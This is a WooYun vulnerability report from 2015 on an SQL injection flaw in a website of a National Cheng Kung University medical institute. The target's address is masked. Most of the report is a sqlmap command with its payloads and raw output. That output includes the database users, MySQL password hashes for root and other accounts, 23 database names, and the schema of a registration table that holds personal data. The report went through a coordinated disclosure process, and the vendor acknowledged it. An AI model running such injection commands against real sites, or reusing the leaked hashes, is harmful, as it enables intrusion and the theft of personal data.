当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149235

漏洞标题:台湾国立成功大学医学研究所某处存在SQL注入漏洞(DBA权限/root密码泄露/23个库)(臺灣地區)

相关厂商:台湾国立成功大学

漏洞作者: 路人甲

提交时间:2015-10-25 10:08

修复时间:2015-12-10 23:52

公开时间:2015-12-10 23:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(Hitcon台湾互联网漏洞报告平台)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-25: 细节已通知厂商并且等待厂商处理中
2015-10-26: 厂商已经确认,细节仅向厂商公开
2015-11-05: 细节向核心白帽子及相关领域专家公开
2015-11-15: 细节向普通白帽子公开
2015-11-25: 细节向实习白帽子公开
2015-12-10: 细节向公众公开

简要描述:

台湾国立成功大学医学研究所某处存在SQL注入漏洞(DBA权限/root密码泄露/23个库)

详细说明:

测试地址:http://**.**.**.**/english/index.php?content=teacher_person&id=13

python sqlmap.py -u "http://**.**.**.**/english/index.php?content=teacher_person&id=13" -p id --technique=BU --random-agent --batch --current-user --is-dba --users --passwords

漏洞证明:

---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: content=teacher_person&id=13' AND 6837=6837 AND 'dwcv'='dwcv
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: content=teacher_person&id=13' UNION ALL SELECT NULL,NULL,CONCAT(0x71717a6271,0x594a505444554a6b544d774d4b74764c6a6573426d76484379616d566f746a6847784f7266485154,0x71717a7671),NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.4.33
back-end DBMS: MySQL >= 5.0.0
current user: 'root@localhost'
current user is DBA: True
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: content=teacher_person&id=13' AND 6837=6837 AND 'dwcv'='dwcv
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: content=teacher_person&id=13' UNION ALL SELECT NULL,NULL,CONCAT(0x71717a6271,0x594a505444554a6b544d774d4b74764c6a6573426d76484379616d566f746a6847784f7266485154,0x71717a7671),NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.4.33
back-end DBMS: MySQL 5
database management system users [5]:
[*] 'csie_db'@'localhost'
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'%'
[*] 'root'@'localhost'
[*] 'root'@'nckucsie-web'
database management system users password hashes:
[*] csie_db [1]:
password hash: 11b2fa385b550ba2
[*] debian-sys-maint [1]:
password hash: 78b482ca427c2f77
[*] root [2]:
password hash: *DD4F7853FD6ECCC38CA99648DF0363D52194D3B4
password hash: 11b2fa385b550ba2
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: content=teacher_person&id=13' AND 6837=6837 AND 'dwcv'='dwcv
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: content=teacher_person&id=13' UNION ALL SELECT NULL,NULL,CONCAT(0x71717a6271,0x594a505444554a6b544d774d4b74764c6a6573426d76484379616d566f746a6847784f7266485154,0x71717a7671),NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.4.33
back-end DBMS: MySQL 5
available databases [23]:
[*] admission
[*] approbate
[*] class_system
[*] classmate
[*] csie
[*] dept
[*] deptvalid
[*] health
[*] ics2010
[*] imi
[*] information_schema
[*] instvalid
[*] lib
[*] lib_system
[*] master
[*] msic
[*] mysql
[*] ncku_csie
[*] performance_schema
[*] phd
[*] schoolmate
[*] score
[*] test
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: content=teacher_person&id=13' AND 6837=6837 AND 'dwcv'='dwcv
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: content=teacher_person&id=13' UNION ALL SELECT NULL,NULL,CONCAT(0x71717a6271,0x594a505444554a6b544d774d4b74764c6a6573426d76484379616d566f746a6847784f7266485154,0x71717a7671),NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.4.33
back-end DBMS: MySQL 5
Database: admission
[2 tables]
+----------+
| proposal |
| register |
+----------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: content=teacher_person&id=13' AND 6837=6837 AND 'dwcv'='dwcv
Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: content=teacher_person&id=13' UNION ALL SELECT NULL,NULL,CONCAT(0x71717a6271,0x594a505444554a6b544d774d4b74764c6a6573426d76484379616d566f746a6847784f7266485154,0x71717a7671),NULL,NULL,NULL,NULL,NULL,NULL-- -
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.4.33
back-end DBMS: MySQL 5
Database: admission
Table: register
[21 columns]
+--------+-------------+
| Column | Type |
+--------+-------------+
| time | datetime |
| birth | varchar(16) |
| car1 | tinyint(1) |
| car2 | tinyint(1) |
| car3 | tinyint(1) |
| cell | varchar(16) |
| email | varchar(64) |
| food | varchar(16) |
| food1 | tinyint(1) |
| food2 | tinyint(1) |
| food3 | tinyint(1) |
| id | varchar(16) |
| name | varchar(32) |
| office | varchar(64) |
| other1 | tinyint(1) |
| other2 | tinyint(1) |
| other3 | tinyint(1) |
| plate | varchar(16) |
| school | varchar(64) |
| tel | varchar(32) |
| title | varchar(64) |
+--------+-------------+

修复方案:

过滤。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-10-26 23:50

厂商回复:

感謝通報

最新状态:

暂无


漏洞评价:

评价